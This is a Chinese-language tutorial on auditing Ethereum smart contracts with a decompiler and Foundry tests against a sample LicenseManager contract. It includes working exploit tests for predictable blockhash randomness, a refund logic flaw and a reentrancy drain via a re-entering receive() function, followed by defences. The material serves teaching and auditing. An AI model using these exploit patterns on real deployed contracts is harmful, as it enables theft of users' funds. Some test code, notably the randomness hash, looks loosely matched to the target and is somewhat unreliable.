18、以太坊智能合约漏洞发现与利用指南

以太坊智能合约漏洞发现与利用指南

在以太坊智能合约的世界里，安全是至关重要的。本文将深入探讨如何发现和利用以太坊智能合约中的漏洞，以及如何使用Foundry等工具进行动态分析和测试。

1. 反编译合约字节码

首先，我们可以通过反编译合约字节码来了解智能合约的功能。即使我们只在区块链上存储了字节码，没有源代码，也可以通过反编译来逆向工程合约。
- 使用工具反编译 ：可以使用如library.dedaub.com/decompile这样的反编译器，粘贴运行时字节码进行反编译。例如，对于 0xdfea953f 函数，反编译后可以看到 keccak256 函数对 msg.value 、 msg.sender 、数字 1337 和 block.blockhash 的安全减法操作，然后应用100取模，最后与 msg.value 变量除以十六进制表示的 1e16 进行比较。

graph TD;
    A[粘贴字节码到反编译器] --> B[反编译合约];
    B --> C[分析反编译结果];

2. 使用“forge test”进行动态分析

Foundry是一个强大的工具，我们可以直接在Solidity中编写测试代码，利用其丰富的作弊码来调试和改变区块链状态，加速测试过程。
- 创建测试合约 ：在VSCode Explorer中创建一个名为 LicenseManager.t.sol 的文件，编写以下代码来准备测试合约：

// 导入Forge标准库
import "forge-std/Test.sol";
// 导入要测试的合约
import "./LicenseManager.sol";

contract LicenseManagerTest is Test {
    // 创建LicenseManager合约实例
    LicenseManager license;
    // 创建地址
    address owner = makeAddr("owner");
    address[] users;
    address attacker = makeAddr("attacker");

    // setUp函数，在每个测试用例前执行
    function setUp() public {
        // 模拟所有者创建合约
        vm.prank(owner);
        license = new LicenseManager();
        // 分配以太币
        vm.deal(owner, 100 ether);
        for (uint i = 0; i < 4; i++) {
            address user = makeAddr(string(abi.encodePacked("user", i)));
            users.push(user);
            vm.deal(user, 1 ether);
        }
        vm.deal(attacker, 0.01 ether);
        // 用户购买许可证
        for (uint i = 0; i < users.length; i++) {
            vm.prank(users[i]);
            license.buyLicense{value: 1 ether}();
        }
    }
}

• 运行测试 ：在VSCode终端中运行 forge test -vv 命令来编译和运行测试。

3. 利用链属性中的弱随机源漏洞

通过分析反编译结果，我们可以发现合约中使用的随机数生成函数存在漏洞。我们可以编写测试函数来利用这个漏洞。
- 编写测试函数 ：在 LicenseManager.t.sol 文件中添加 test_badrandomness 函数：

function test_badrandomness() public {
    // 给攻击者0.01以太币
    vm.deal(attacker, 0.01 ether);
    // 模拟攻击者
    vm.startPrank(attacker);
    console.log("Testing bad randomness with blockhash");
    console.log(attacker.balance);
    // 初始化块号
    uint blockNumber = block.number;
    for (uint i = 0; i < 100; i++) {
        // 设置块号
        vm.roll(blockNumber + i);
        // 验证哈希值
        uint hash = uint(keccak256(abi.encodePacked(msg.value, msg.sender, 1337, blockhash(block.number - 1))));
        uint mod = hash % 100;
        uint maxThreshold = 0.5 ether / 1e16;
        console.log("We are on block", block.number, "with hashed number", mod);
        if (mod == 0) {
            console.log("Found! Sending 0.01 ether to obtain the license");
            license.winLicense{value: 0.01 ether}();
            break;
        }
    }
    // 断言是否获得许可证
    assertEq(license.checkLicense(attacker), true);
    vm.stopPrank();
}

• 运行测试 ：再次运行 forge test -vv 命令，观察测试结果。当哈希值为0时，发送请求并获得许可证。

4. 利用业务逻辑漏洞

除了随机数漏洞，合约的业务逻辑中也可能存在漏洞。例如， refundLicense 函数在退还许可证时，不考虑实际购买价格，直接发送1以太币。
- 编写测试函数 ：在 LicenseManager.t.sol 文件中添加以下代码：

function test_refund_price() public {
    // 模拟攻击者
    vm.startPrank(attacker);
    console.log("Initial Balance:", attacker.balance);
    // 攻击者获得许可证
    vm.deal(attacker, 0.01 ether);
    license.winLicense{value: 0.01 ether}();
    console.log("After Win Balance:", attacker.balance);
    // 请求退款
    license.refundLicense();
    console.log("After Ref Balance:", attacker.balance);
    // 断言攻击者的余额增加
    assertGt(attacker.balance, 0.01 ether);
    vm.stopPrank();
}

• 运行测试 ：运行 forge test -vv 命令，验证是否成功利用业务逻辑漏洞。

5. 利用重入漏洞

重入漏洞是以太坊智能合约中最著名的漏洞之一。当一个函数在执行过程中被中断并再次调用时，就可能发生重入攻击。
- 分析重入风险 ：观察 refundLicense 函数，发现存在重入风险的迹象：
- 先从 licensed 映射中移除 msg.sender 的地址，然后进行转账，但 require 函数的检查是在 licenseOwners 中，且在转账后更新。
- 转账使用了低级调用。
- 编写测试函数 ：在 LicenseManager.t.sol 文件中添加 test_reentrancy 函数：

function test_reentrancy() public {
    // 给合约分配1以太币
    vm.deal(address(this), 1 ether);
    console.log("Initial Balance", address(this).balance);
    // 购买许可证
    license.buyLicense{value: 1 ether}();
    console.log("After Buy", address(this).balance);
    // 请求退款
    license.refundLicense();
    console.log("Final Balance", address(this).balance);
    // 断言余额增加
    assertEq(address(this).balance > 1 ether, true);
}

• 运行测试并调试 ：运行 forge test -vv --match-test "test_reentrancy" 命令，若测试失败，可增加日志详细程度，如 forge test -vvv --match-test "test_reentrancy" ，分析交易痕迹，找出失败原因。
  • 如果发现合约无法接收以太币，可在合约中添加 receive 函数，并标记为 external 和 payable 。
  • 如果出现 OutOfFund 错误，可在 receive 函数中添加资金检查。

6. 其他潜在漏洞及资源

除了上述漏洞， LicenseManager 智能合约还可能存在其他问题，如缺乏紧急“启动和停止”功能、无法转移所有权、存在不必要的代码、 for 循环可能导致拒绝服务等。
以下是一些有用的资源，可帮助我们发现和防范智能合约漏洞：
| 资源名称 | 描述 |
| ---- | ---- |
| Ethereum Smart Contract Best Practices Attacks | 由ConsenSys提供，包含重入、预言机操纵、抢先交易、时间戳依赖、不安全算术、拒绝服务、恶意攻击和强制喂食等常见攻击方式。 |
| Smart Contract Weakness Classification (SWC) Register | 由Gerhard Wagner推广，将SWC与常见弱点枚举（CWE）进行映射。 |
| Decentralized Application Security Project (DASP) TOP 10 | 由NCC Group提供，列出了包括重入、访问控制、算术问题、低级调用未检查返回值、拒绝服务和随机数问题等重要漏洞。 |
| Smart Contract Security Verification Standard v2 | 一个方便的检查表，将漏洞分为通用和特定组件，并为代币、治理、预言机、金库、桥接、NFT、质押、池和集成等提供具体列表。 |

7. Foundry及其他工具的强大功能

Foundry提供了丰富的作弊码，可根据需求进行各种操作：
- 创建主网或测试网分叉 ：使用 vm.createSelectFork 作弊码，指定Infura或Alchemy等端点，创建主网或测试网的分叉，在更真实的环境中工作。
- 改变时间戳 ：类似于使用 vm.roll 改变 block.number ，可以使用 vm.warp 函数改变 block.timestamp ，在时间上移动。
- 处理回滚 ：使用 vm.expectRevert 来处理回滚，避免测试出错。

通过以上步骤，我们可以发现和利用以太坊智能合约中的各种漏洞，同时也可以学习如何防范这些漏洞，提高智能合约的安全性。在开发和部署智能合约时，务必进行充分的测试和审计，确保合约的健壮性。

以太坊智能合约漏洞发现与利用指南（续）

8. 深入分析重入漏洞利用过程

在前面我们提到了重入漏洞的分析和初步测试，但在实际利用过程中，还需要更深入的调试和优化。
- 详细分析失败原因 ：当最初运行 test_reentrancy 测试失败时，通过增加日志详细程度，使用 forge test -vvv --match-test "test_reentrancy" 命令，我们可以看到详细的交易痕迹。例如，发现 LicenseManagerTest 合约的 fallback 函数无法接收以太币，导致交易回滚。

graph TD;
    A[运行测试] --> B[测试失败];
    B --> C[增加日志详细程度];
    C --> D[分析交易痕迹];
    D --> E[找出失败原因];

• 优化合约代码 ：根据分析结果，我们在 LicenseManagerTest 合约中添加 receive 函数，使其能够接收以太币，并添加日志确认以太币的接收。

receive() external payable {
    console.log("ETH Arrived", msg.value);
    if (address(license).balance > 0) {
        console.log("Reenter");
        license.refundLicense();
    }
}

• 再次运行测试 ：添加 receive 函数后，再次运行 forge test -vv --match-test "test_reentrancy" 命令，观察测试结果。如果仍然失败，继续分析错误信息，如出现 OutOfFund 错误，说明 LicenseManager 合约在某一时刻以太币不足。
• 添加资金检查 ：为了避免 OutOfFund 错误，在 receive 函数中添加资金检查，确保只有在 LicenseManager 合约有足够资金时才继续调用 refundLicense 函数。

9. 漏洞利用的实际影响和防范措施

• 漏洞利用的实际影响 ：不同类型的漏洞利用会对智能合约和用户造成不同的影响。
  • 弱随机源漏洞 ：攻击者可以通过预测随机数结果，有针对性地发送请求，从而更容易获得许可证，破坏了合约的公平性。
  • 业务逻辑漏洞 ：攻击者可以以较低的成本获得许可证，然后通过退款函数获得更多的以太币，导致合约资金损失。
  • 重入漏洞 ：攻击者可以多次调用退款函数，耗尽合约的以太币，使合约无法正常运行。
    | 漏洞类型 | 实际影响 |
    | ---- | ---- |
    | 弱随机源漏洞 | 破坏合约公平性，攻击者更易获许可证 |
    | 业务逻辑漏洞 | 合约资金损失，攻击者低价获证并高额退款 |
    | 重入漏洞 | 耗尽合约以太币，导致合约无法正常运行 |
• 防范措施 ：为了防范这些漏洞，在开发智能合约时应采取以下措施：
  • 使用安全的随机数生成方法 ：避免使用链上属性（如 block.number 、 block.timestamp ）生成随机数，可以使用预言机等外部数据源。
  • 完善业务逻辑 ：在编写合约时，仔细考虑各种情况，确保退款等功能考虑实际购买价格。
  • 使用重入保护机制 ：可以使用 ReentrancyGuard 等库来防止重入攻击，在函数执行前检查是否已经在执行中。

10. 利用工具进行漏洞发现的最佳实践

在使用Foundry等工具进行漏洞发现时，有一些最佳实践可以遵循：
- 全面测试 ：编写尽可能多的测试用例，覆盖合约的各种功能和边界情况。例如，对于 LicenseManager 合约，测试购买许可证、退款、获胜条件等功能。
- 合理使用作弊码 ：Foundry的作弊码可以帮助我们模拟各种情况，但要注意使用的合理性。例如，使用 vm.roll 和 vm.warp 时，要确保模拟的情况符合实际场景。
- 结合多种工具 ：除了Foundry，还可以结合其他工具进行漏洞发现，如静态分析工具（如Slither）和动态分析工具（如Mythril）。

graph TD;
    A[编写全面测试用例] --> B[使用合理作弊码];
    B --> C[结合多种工具];
    C --> D[发现更多漏洞];

11. 持续学习和关注安全动态

以太坊智能合约的安全领域不断发展，新的漏洞和攻击方式不断涌现。因此，持续学习和关注安全动态是非常重要的。
- 学习资源 ：可以通过阅读相关的书籍、文章、博客等，学习最新的安全知识和技术。例如，关注以太坊官方文档、ConsenSys等安全机构的研究报告。
- 参与社区 ：加入以太坊安全社区，与其他开发者和安全专家交流经验，分享发现的漏洞和解决方案。例如，参与以太坊安全论坛、GitHub上的开源项目。
- 关注漏洞报告 ：及时关注各种漏洞报告平台，了解最新的漏洞信息和修复方法。例如，关注SWC Register、DASP TOP 10等报告。

通过持续学习和关注安全动态，我们可以不断提高自己的安全意识和技能，更好地发现和防范以太坊智能合约中的漏洞。

在以太坊智能合约的开发和部署过程中，安全是一个永恒的话题。我们需要不断学习和实践，利用各种工具和技术，发现和防范合约中的漏洞，确保合约的安全性和可靠性。同时，要积极参与社区，分享经验，共同推动以太坊智能合约安全领域的发展。